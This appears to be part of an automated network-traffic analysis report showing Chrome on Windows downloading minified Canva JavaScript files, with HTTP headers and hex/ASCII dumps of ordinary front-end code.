                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 64 20 30 7d 63 6f 6e 73 74 20 7b 68 65 69 67 68 74 3a 75 2c 77 69 64 74 68 3a 77 7d 3d 31 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 7a 62 29 3f 7b 68 65 69 67 68 74 3a 74 2e 77 65 69 67 68 74 2c 77 69 64 74 68 3a 74 2e 77 65 69 67 68 74 7d 3a 7b 68 65 69 67 68 74 3a 4d 61 74 68 2e 6d 61 78 28 28 6e 75 6c 6c 3d 3d 3d 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 77 65 69 67 68 74 29 7c 7c 30 2c 28 6e 75 6c 6c 3d 3d 3d 6d 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 76 6f 69 64 20 30 3a 6d 2e 77 65 69 67 68 74 29 7c 7c 30 29 2c 77 69 64 74 68 3a 4d 61 74 68 2e 6d 61 78 28 28 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 77 65 69 67 68 74
                                                                                                                                                                                                                                                    Data Ascii: d 0}const {height:u,width:w}=1===(null===t||void 0===t?void 0:t.zb)?{height:t.weight,width:t.weight}:{height:Math.max((null===l||void 0===l?void 0:l.weight)||0,(null===m||void 0===m?void 0:m.weight)||0),width:Math.max((null===n||void 0===n?void 0:n.weight


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    29192.168.2.449772104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC615OUTGET /web/f919d823e68691c3.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:29 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 2941
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a18edfa428f-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71058
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "f1580512de3ac255d76178fc682b9f0c"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:15 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:34 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: pi/m2SpWzGysZBtohndFPYrCAwVjUFZJ/XAT3j6T0Me0eMTTrxHUTs1wyDotzQrEZIqkiDZM6eU=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYKYWJEDPAW281K
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: 6Qnk_U8Kp9nmDUFIssF05sqAw_I_OOfu
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 6d 6d 56 75 25 32 46 46 37 31 68 49 58 4c 78 79 58 37 51 68 63 38 50 35 4d 51 56 73 47 76 4b 77 48 4c 51 4b 62 64 52 70 6b 72 61 6a 54 5a 42 71 6a 6b 34 76 74 4d 39 38 67 69 44 53 6e 49 38 53 45 6e 25 32 42 4f 30 71 59 41 25 32 42 42 57 7a 55 42 59 48 54 4a 4f 50 67 45 6f 79 6d 5a 4a 32 48 63 37 32 39 50 71 36 77 6a 4c 54 75 4e 48 32 32 41 74 51 25 32 46 38 4a 6e 56 71 30 70 42 44 42 4f 75 7a 30 72 45 51 6e 39 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmVu%2FF71hIXLxyX7Qhc8P5MQVsGvKwHLQKbdRpkrajTZBqjk4vtM98giDSnI8SEn%2BO0qYA%2BBWzUBYHTJOPgEoymZJ2Hc729Pq6wjLTuNH22AtQ%2F8JnVq0pBDBOuz0rEQn9s%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1197INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 30 32 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 31 35 33 33 32 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 66
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1302],{/***/ 153325:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._f
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 63 2e 6f 38 61 3d 49 59 2e 75 73 65 52 65 66 3b 5f 5f 63 2e 70 38 61 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 34 32 37 38 32 29 2e 45 48 3b 76 61 72 20 67 38 61 3d 6e 65 77 20 4d 61 70 28 5b 5b 22 70 61 67 65 22 2c 22 6e 75 6d 62 65 72 22 5d 5d 29 3b 4a 59 3d 5f 5f 63 2e 4a 59 3d 7b 4c 49 4e 45 41 52 3a 31 2c 4c 68 3a 32 2c 54 66 3a 33 2c 66 6c 3a 34 2c 69 43 3a 35 2c 4c 76 3a 36 2c 67 47 3a 37 2c 6b 52 3a 38 2c 68 52 3a 39 2c 6c 52 3a 31 30 2c 66 52 3a 31 31 2c 67 52 3a 31 32 2c 56 62 61 3a 31 33 2c 6d 52 3a 31 34 2c 49 6e 3a 31 35 2c 4e 62 61 3a 31 36 2c 4f 62 61 3a 31 37 2c 50 62 61 3a 31 38 2c 51 62 61 3a 31 39 2c 52 62 61 3a 32 30 2c 53 62 61 3a 32 31 2c 54 62 61 3a 32 32 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 67 6e
                                                                                                                                                                                                                                                    Data Ascii: c.o8a=IY.useRef;__c.p8a=__webpack_require__(42782).EH;var g8a=new Map([["page","number"]]);JY=__c.JY={LINEAR:1,Lh:2,Tf:3,fl:4,iC:5,Lv:6,gG:7,kR:8,hR:9,lR:10,fR:11,gR:12,Vba:13,mR:14,In:15,Nba:16,Oba:17,Pba:18,Qba:19,Rba:20,Sba:21,Tba:22};(function(a){a.gn
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC375INData Raw: 5d 3a 4d 59 2c 5b 4a 59 2e 66 6c 5d 3a 4d 59 2c 5b 4a 59 2e 69 43 5d 3a 4d 59 2c 5b 4a 59 2e 4c 76 5d 3a 4d 59 2c 5b 4a 59 2e 67 47 5d 3a 4d 59 2c 5b 4a 59 2e 6b 52 5d 3a 4d 59 2c 5b 4a 59 2e 68 52 5d 3a 4d 59 2c 5b 4a 59 2e 6c 52 5d 3a 4d 59 2c 5b 4a 59 2e 66 52 5d 3a 5b 2d 2e 32 38 2c 31 5d 2c 5b 4a 59 2e 67 52 5d 3a 5b 30 2c 31 2e 32 38 5d 2c 5b 4a 59 2e 56 62 61 5d 3a 5b 2d 2e 31 37 2c 31 5d 2c 5b 4a 59 2e 6d 52 5d 3a 5b 30 2c 31 2e 31 37 5d 2c 5b 4a 59 2e 49 6e 5d 3a 4d 59 2c 5b 4a 59 2e 4e 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 4f 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 50 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 51 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 52 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 53 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 54 62 61 5d 3a 4d 59 7d 2c 70 48 3a 5f 5f 63 2e 4c
                                                                                                                                                                                                                                                    Data Ascii: ]:MY,[JY.fl]:MY,[JY.iC]:MY,[JY.Lv]:MY,[JY.gG]:MY,[JY.kR]:MY,[JY.hR]:MY,[JY.lR]:MY,[JY.fR]:[-.28,1],[JY.gR]:[0,1.28],[JY.Vba]:[-.17,1],[JY.mR]:[0,1.17],[JY.In]:MY,[JY.Nba]:MY,[JY.Oba]:MY,[JY.Pba]:MY,[JY.Qba]:MY,[JY.Rba]:MY,[JY.Sba]:MY,[JY.Tba]:MY},pH:__c.L


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    30192.168.2.449773104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC787OUTGET /web/dd1f23ecb46acb13.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:29 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 17168
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a191835c413-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71058
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "877fa88bfb6fe3a883ace013e852f98c"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:15 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: Ze0v+QXQIqs3xVBfFHAbPm9kUip9rUT4CotqKFpdMbM0xJBaXKqmV3wo+aOr3dPZlBRBnz1my8Y=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYG27QS7B8A0S39
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: .2cYOTML3mPyRXGpZ6z5P_Bw7.HnzFMI
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 25 32 46 74 25 32 42 25 32 42 73 41 38 36 36 64 49 47 6a 49 25 32 46 77 51 55 67 53 51 51 6a 63 54 7a 66 75 45 6a 71 79 72 55 6c 33 6c 66 58 52 49 6e 6f 6e 63 57 4e 6f 52 70 76 33 53 4e 33 50 35 44 58 65 56 39 7a 61 46 51 38 52 72 55 34 48 63 55 62 61 35 76 68 54 4b 4d 46 42 58 6c 51 6a 4d 4b 7a 6f 6a 4a 6b 6b 43 53 25 32 42 44 66 39 34 70 25 32 42 4f 51 32 43 6a 69 79 6f 4b 6e 47 4e 4f 38 32 57 47 76 6f 32 79 52 36 41 51 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Ft%2B%2BsA866dIGjI%2FwQUgSQQjcTzfuEjqyrUl3lfXRInoncWNoRpv3SN3P5DXeV9zaFQ8RrU4HcUba5vhTKMFBXlQjMKzojJkkCS%2BDf94p%2BOQ2CjiyoKnGNO82WGvo2yR6AQw%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 39 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 36 36 35 30 35 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72 65
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[495],{/***/ 665054:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_re
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 69 6f 6e 28 61 2c 62 3d 22 6d 65 64 69 75 6d 22 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 61 26 26 0a 76 6f 69 64 20 30 21 3d 3d 61 26 26 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 63 3d 28 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 62 3f 62 3a 55 7a 62 5b 62 5d 29 2a 28 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 7c 7c 31 29 3b 72 65 74 75 72 6e 5b 2e 2e 2e 61 5d 2e 73 6f 72 74 28 28 64 2c 65 29 3d 3e 7b 64 3d 64 2e 77 69 64 74 68 3b 65 3d 65 2e 77 69 64 74 68 3b 72 65 74 75 72 6e 20 64 3e 63 26 26 65 3c 63 3f 2d 31 3a 64 3c 63 26 26 65 3e 63 3f 31 3a 4d 61 74 68 2e 61 62 73 28 64 2d 63 29 2d 4d 61 74 68 2e 61 62 73 28 65 2d 63 29 7d 29 5b 30 5d 2e 75 72 6c 7d 7d 2c 58 7a 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74
                                                                                                                                                                                                                                                    Data Ascii: ion(a,b="medium"){if(null!==a&&void 0!==a&&a.length){var c=("number"===typeof b?b:Uzb[b])*(window.devicePixelRatio||1);return[...a].sort((d,e)=>{d=d.width;e=e.width;return d>c&&e<c?-1:d<c&&e>c?1:Math.abs(d-c)-Math.abs(e-c)})[0].url}},Xzb=function(){const
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 65 6e 3a 77 3d 3e 58 36 28 61 41 62 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 77 2c 63 68 69 6c 64 72 65 6e 3a 58 36 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 59 36 28 22 54 33 75 7a 35 51 22 2c 6e 29 2c 72 65 66 3a 71 28 62 29 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 77 3d 3d 3d 62 41 62 7c 7c 77 3d 3d 3d 63 41 62 7c 7c 77 3d 3d 3d 64 41 62 2c 63 68 69 6c 64 72 65 6e 3a 61 7d 29 7d 29 7d 2c 62 29 5d 7d 29 7d 29 7d 2c 5a 7a 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 5b 63 2c 0a 64 5d 3d 66 41 62 28 28 29 3d 3e 5b 7b 6b 65 79 3a 61 2c 65 6c 65 6d 65 6e 74 3a 62 7d 5d 29 3b 67 41 62 28 28 29 3d 3e 7b 64 28 66 3d 3e 66 2e 65 76 65 72 79 28 67 3d 3e 67 2e 6b 65 79 21 3d 3d 61 29 3f 66 2e 63 6f 6e 63 61 74 28 7b
                                                                                                                                                                                                                                                    Data Ascii: en:w=>X6(aAb.Provider,{value:w,children:X6("div",{className:Y6("T3uz5Q",n),ref:q(b),"aria-hidden":w===bAb||w===cAb||w===dAb,children:a})})},b)]})})},Zzb=function(a,b){const [c,d]=fAb(()=>[{key:a,element:b}]);gAb(()=>{d(f=>f.every(g=>g.key!==a)?f.concat({
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 63 68 28 28 29 3d 3e 7b 24 36 28 28 29 3d 3e 61 2e 53 70 61 2e 73 65 74 28 62 2c 7b 73 74 61 74 75 73 3a 32 7d 29 29 3b 66 28 76 6f 69 64 20 30 29 7d 29 3a 66 28 76 6f 69 64 20 30 29 7d 29 3b 61 2e 70 72 6f 6d 69 73 65 73 2e 73 65 74 28 62 2c 65 29 7d 72 65 74 75 72 6e 20 61 2e 70 72 6f 6d 69 73 65 73 2e 67 65 74 28 62 29 7d 3b 0a 5f 5f 63 2e 72 59 2e 70 72 6f 74 6f 74 79 70 65 2e 52 48 3d 5f 5f 63 2e 4e 59 28 31 33 2c 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 5f 63 2e 76 28 6e 75 6c 6c 21 3d 61 2e 69 64 26 26 2f 5e 44 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2d 5d 7b 31 30 7d 24 2f 2e 74 65 73 74 28 61 2e 69 64 29 2c 22 47 65 74 44 6f 63 75 6d 65 6e 74 53 75 6d 6d 61 72 79 41 70 69 52 65 71 75 65 73 74 23 69 64 20 64 6f 65 73 20 6e 6f 74 20 6d 61
                                                                                                                                                                                                                                                    Data Ascii: ch(()=>{$6(()=>a.Spa.set(b,{status:2}));f(void 0)}):f(void 0)});a.promises.set(b,e)}return a.promises.get(b)};__c.rY.prototype.RH=__c.NY(13,async function(a){__c.v(null!=a.id&&/^D[a-zA-Z0-9_-]{10}$/.test(a.id),"GetDocumentSummaryApiRequest#id does not ma
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 72 65 5f 5f 28 35 30 33 32 31 36 29 3b 76 61 72 20 24 7a 62 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 34 38 39 32 31 32 29 2e 5a 3b 76 61 72 20 67 37 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 39 32 30 30 39 29 2c 64 41 62 3d 67 37 2e 57 6a 2c 62 41 62 3d 67 37 2e 49 78 2c 63 41 62 3d 67 37 2e 24 72 3b 76 61 72 20 79 41 62 3d 63 6c 61 73 73 7b 73 74 61 74 69 63 20 42 28 61 29 7b 4c 28 61 2c 7b 74 65 78 74 3a 56 36 2c 75 73 65 72 3a 56 36 2c 62 72 61 6e 64 3a 56 36 7d 29 7d 67 65 74 20 74 65 78 74 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 55 64 2e 74 65 78 74 7d 67 65 74 20 75 73 65 72 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 55 64 2e 75 73 65 72 7d 67 65 74 20 62 72 61 6e 64 28 29 7b 72 65 74 75 72 6e 20 74
                                                                                                                                                                                                                                                    Data Ascii: re__(503216);var $zb=__webpack_require__(489212).Z;var g7=__webpack_require__(92009),dAb=g7.Wj,bAb=g7.Ix,cAb=g7.$r;var yAb=class{static B(a){L(a,{text:V6,user:V6,brand:V6})}get text(){return this.Ud.text}get user(){return this.Ud.user}get brand(){return t
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 51 70 2e 74 79 70 65 3f 74 68 69 73 2e 50 71 2e 51 70 2e 64 61 74 65 3a 76 6f 69 64 20 30 29 7c 7c 28 61 3d 6e 65 77 20 44 61 74 65 2c 61 3d 5f 5f 63 2e 6a 77 28 61 29 2c 61 3d 7b 79 65 61 72 3a 61 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2c 6d 6f 6e 74 68 3a 61 2e 67 65 74 4d 6f 6e 74 68 28 29 2b 31 2c 64 61 79 3a 61 2e 67 65 74 44 61 74 65 28 29 2c 78 43 61 3a 61 2e 67 65 74 48 6f 75 72 73 28 29 2c 4c 46 61 3a 61 2e 67 65 74 4d 69 6e 75 74 65 73 28 29 7d 29 3b 72 65 74 75 72 6e 20 61 7d 67 65 74 20 74 65 78 74 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 50 71 2e 46 74 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 29 7b 4b 7a 62 2e 42 28 74 68 69 73 29 3b 74 68 69 73 2e 50 71 3d 61 3b 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 3d 62 3b 74 68 69 73 2e 74
                                                                                                                                                                                                                                                    Data Ascii: Qp.type?this.Pq.Qp.date:void 0)||(a=new Date,a=__c.jw(a),a={year:a.getFullYear(),month:a.getMonth()+1,day:a.getDate(),xCa:a.getHours(),LFa:a.getMinutes()});return a}get text(){return this.Pq.Ft}constructor(a,b){Kzb.B(this);this.Pq=a;this.language=b;this.t
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 68 69 73 2e 50 30 2e 51 4d 28 61 29 7d 56 33 28 61 29 7b 74 68 69 73 2e 6b 67 61 2e 56 33 28 61 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 50 30 3d 61 3b 74 68 69 73 2e 6b 67 61 3d 62 3b 74 68 69 73 2e 73 48 3d 63 3b 74 68 69 73 2e 6d 61 61 3d 6e 65 77 20 5f 5f 63 2e 65 5f 61 3b 74 68 69 73 2e 4a 41 61 3d 64 3d 3e 5f 5f 63 2e 4b 49 28 74 68 69 73 2e 6d 61 61 2c 64 29 7d 7d 3b 76 61 72 20 55 7a 62 3d 7b 78 78 73 6d 61 6c 6c 3a 31 36 2c 78 73 6d 61 6c 6c 3a 32 34 2c 73 6d 61 6c 6c 3a 33 32 2c 6d 65 64 69 75 6d 3a 34 30 2c 6c 61 72 67 65 3a 34 38 2c 78 6c 61 72 67 65 3a 36 34 2c 78 78 6c 61 72 67 65 3a 38 30 2c 78 78 78 6c 61 72 67 65 3a 31 36 30 7d 3b 76 61 72 20 53 7a 62 3d 5b 22 72 67 62 28 30 2c 20 31 32 36 2c 20 31 38
                                                                                                                                                                                                                                                    Data Ascii: his.P0.QM(a)}V3(a){this.kga.V3(a)}constructor(a,b,c){this.P0=a;this.kga=b;this.sH=c;this.maa=new __c.e_a;this.JAa=d=>__c.KI(this.maa,d)}};var Uzb={xxsmall:16,xsmall:24,small:32,medium:40,large:48,xlarge:64,xxlarge:80,xxxlarge:160};var Szb=["rgb(0, 126, 18
